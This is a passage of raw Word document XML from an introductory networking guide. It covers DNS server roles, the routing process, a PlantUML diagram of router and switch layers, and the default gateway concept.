            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7764" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BAA6659" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>The first DNS server your device will try to contact when resolving a domain name.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="432523A6" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>If it responds, all queries go through it until it fails or becomes unreachable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00197245" w14:paraId="3470C728" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E6E6C20" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Secondary DNS IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7764" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D36EAAE" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>A fallback DNS server your device will use if the primary one doesn’t respond.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ED60B00" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:t>Ensures continued name resolution if the primary is down, slow, or blocked.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6595204C" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00FE48C6" w:rsidRDefault="00A60755" w:rsidP="00A60755"/>
    <w:p w14:paraId="2504EA7D" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial Black" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D931789" w14:textId="2478043E" w:rsidR="00224B1D" w:rsidRDefault="00403436" w:rsidP="00C75443">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Network </w:t>
      </w:r>
      <w:r w:rsidR="00224B1D">
        <w:t>Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C8A0F" w14:textId="77777777" w:rsidR="00366172" w:rsidRPr="00366172" w:rsidRDefault="00366172" w:rsidP="00366172">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00366172">
        <w:t>Introduction to Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C193A9E" w14:textId="77777777" w:rsidR="00366172" w:rsidRPr="00366172" w:rsidRDefault="00366172" w:rsidP="00366172">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00366172">
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FE3683" w14:textId="77777777" w:rsidR="003B6365" w:rsidRDefault="00366172" w:rsidP="00366172">
      <w:r w:rsidRPr="00366172">
        <w:t xml:space="preserve">Routing is the process of </w:t>
      </w:r>
      <w:r w:rsidRPr="00366172">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>selecting optimal paths for data packets to travel from their source to their destination across inter</w:t>
      </w:r>
      <w:r w:rsidR="00542205">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00366172">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>connected networks</w:t>
      </w:r>
      <w:r w:rsidRPr="00366172">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEA78B8" w14:textId="149DC794" w:rsidR="00366172" w:rsidRDefault="00366172" w:rsidP="00366172">
      <w:r w:rsidRPr="00366172">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00366172">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>router</w:t>
      </w:r>
      <w:r w:rsidRPr="00366172">
        <w:t xml:space="preserve"> is a specialized network device that forwards data packets between different network segments based on their destination IP addresses, making routing decisions using routing tables and algorithms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3921C9AD" w14:textId="023C535C" w:rsidR="001355DD" w:rsidRPr="00366172" w:rsidRDefault="001355DD" w:rsidP="00366172">
      <w:r w:rsidRPr="001355DD">
        <w:t xml:space="preserve">OSI Layer: </w:t>
      </w:r>
      <w:r>
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidRPr="001355DD">
        <w:t xml:space="preserve"> (Layer </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="001355DD">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442602F6" w14:textId="77777777" w:rsidR="00366172" w:rsidRPr="00366172" w:rsidRDefault="00366172" w:rsidP="00366172">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00366172">
        <w:t>How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A60E9CA" w14:textId="290ECF3A" w:rsidR="00366172" w:rsidRPr="00366172" w:rsidRDefault="00366172" w:rsidP="00366172">
      <w:r w:rsidRPr="00366172">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="003B6365" w:rsidRPr="003B6365">
        <w:t>routing process</w:t>
      </w:r>
      <w:r w:rsidRPr="00366172">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F5D65C" w14:textId="1FA57498" w:rsidR="00366172" w:rsidRPr="00366172" w:rsidRDefault="00366172" w:rsidP="003B6365">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00366172">
        <w:t>Router receives a packet from source network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2D3C8C" w14:textId="55E88F76" w:rsidR="00366172" w:rsidRPr="00366172" w:rsidRDefault="00366172" w:rsidP="003B6365">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00366172">
        <w:t>Examines destination IP address in packet header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E789861" w14:textId="21E846DA" w:rsidR="00366172" w:rsidRPr="00366172" w:rsidRDefault="00366172" w:rsidP="003B6365">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00366172">
        <w:t xml:space="preserve">Searches </w:t>
      </w:r>
      <w:r w:rsidR="003B6365">
        <w:t xml:space="preserve">(lookups) </w:t>
      </w:r>
      <w:r w:rsidRPr="00366172">
        <w:t>routing table for best matching route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737AB30D" w14:textId="5154804C" w:rsidR="00366172" w:rsidRPr="00366172" w:rsidRDefault="00366172" w:rsidP="003B6365">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00366172">
        <w:t>Determines next router or final destination</w:t>
      </w:r>
      <w:r w:rsidR="003B6365">
        <w:t xml:space="preserve"> (next-hop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4533F6A1" w14:textId="69192FB5" w:rsidR="00366172" w:rsidRPr="00366172" w:rsidRDefault="00366172" w:rsidP="003B6365">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00366172">
        <w:t>Sends packet toward destination via selected interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75895088" w14:textId="333709EA" w:rsidR="00366172" w:rsidRPr="00366172" w:rsidRDefault="00366172" w:rsidP="003B6365">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="95"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00366172">
        <w:t>Each router repeats this process until packet reaches destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B0E512" w14:textId="77777777" w:rsidR="00224B1D" w:rsidRDefault="00224B1D" w:rsidP="00224B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8"/>
        <w:gridCol w:w="2268"/>
      </w:tblGrid>
      <w:tr w:rsidR="00542205" w14:paraId="1958BA58" w14:textId="77777777" w:rsidTr="00542205">
        <w:trPr>
          <w:trHeight w:val="6020"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15228" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="774ED2D1" w14:textId="7D2402C2" w:rsidR="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="698ACA0E" wp14:editId="0C76656A">
                  <wp:extent cx="3200088" cy="3759173"/>
                  <wp:effectExtent l="0" t="0" r="635" b="0"/>
                  <wp:docPr id="667827148"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919" cy="3775421"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3298F5A6" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>@startuml</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3114AAA9" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>cloud "Internet" as internet</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00E3E892" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>rectangle "Router" as router #orange</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="425DCDFB" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>rectangle "Switch" as switch #lightcyan</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23B3DEB8" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>rectangle "PC1" as pc1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4673F131" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>rectangle "PC2" as pc2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68F8AF0D" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>rectangle "PC3" as pc3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27608627" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D074662" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>internet &lt;--&gt; router : Layer 3\n(IP Routing)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B23EAA0" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>router &lt;--&gt; switch : Layer 2 and 3\n(Handoff)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BECF1D7" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>switch &lt;--&gt; pc1 : Layer 2\n(Switching)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C06864C" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>switch &lt;--&gt; pc2 : Layer 2\n(Switching)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="415AC622" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>switch &lt;--&gt; pc3 : Layer 2\n(Switching)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="526FECDA" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2ADE539E" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>note top of router : Connects different\nnetworks (subnets)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E3AA7DF" w14:textId="77777777" w:rsidR="00542205" w:rsidRPr="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>note top of switch : Connects devices\nwithin same network</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25FA95FC" w14:textId="1B46D6D4" w:rsidR="00542205" w:rsidRDefault="00542205" w:rsidP="00542205">
            <w:r w:rsidRPr="00542205">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4ADC2509" w14:textId="0A88F0BE" w:rsidR="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Default Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773F4FA7" w14:textId="4488E882" w:rsidR="00340E3A" w:rsidRPr="00340E3A" w:rsidRDefault="00340E3A" w:rsidP="00340E3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E63E49" w14:textId="009E1018" w:rsidR="004F6445" w:rsidRPr="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:r w:rsidRPr="004F6445">
        <w:t xml:space="preserve">A default gateway is the device on your network — usually a router — that your computer sends traffic to when it needs to </w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reach something outside its own local network</w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F07734" w14:textId="1A199952" w:rsidR="004F6445" w:rsidRPr="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:r w:rsidRPr="004F6445">
        <w:t xml:space="preserve">Think of it as the </w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t>exit door</w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t xml:space="preserve"> from your network to the rest of the world</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B19EA13" w14:textId="6675CE6E" w:rsidR="004F6445" w:rsidRPr="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="004F6445">
        <w:t xml:space="preserve">How </w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t>It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3588C2" w14:textId="77777777" w:rsidR="004F6445" w:rsidRPr="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004F6445">
        <w:t>Every device on a network has:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCC5A9C" w14:textId="6561EF06" w:rsidR="004F6445" w:rsidRPr="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004F6445">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP address</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t xml:space="preserve"> its unique ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BCEE3D" w14:textId="51FFC82A" w:rsidR="004F6445" w:rsidRPr="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004F6445">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subnet mask</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t xml:space="preserve"> defines which addresses are </w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t>local</w:t>
      </w:r>
      <w:r>
        <w:t>" (belong to the same subnet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190C4C4A" w14:textId="257ADEA9" w:rsidR="004F6445" w:rsidRPr="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004F6445">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Default gateway</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t>next hop</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t xml:space="preserve"> for anything </w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t xml:space="preserve"> local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D77A38" w14:textId="77777777" w:rsidR="004F6445" w:rsidRPr="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004F6445">
        <w:t>When your computer wants to talk to another device:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707866D2" w14:textId="107AF764" w:rsidR="004F6445" w:rsidRPr="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004F6445">
        <w:t>If the destination IP is inside your subnet</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t xml:space="preserve"> it talks directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D7422" w14:textId="1E5DA99D" w:rsidR="004F6445" w:rsidRPr="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="1080"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004F6445">
        <w:t>If it’s outside your subnet</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004F6445">
        <w:t xml:space="preserve"> it sends the packet to the default gateway, which then routes it toward the destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF7644A" w14:textId="77777777" w:rsidR="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="004F6445">
        <w:lastRenderedPageBreak/>
        <w:t>Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27629456" w14:textId="3F766B19" w:rsidR="004F6445" w:rsidRPr="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="347"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="004F6445">
        <w:t>Your laptop: 192.168.1.50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE15E2B" w14:textId="77777777" w:rsidR="004F6445" w:rsidRPr="004F6445" w:rsidRDefault="004F6445" w:rsidP="004F6445">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
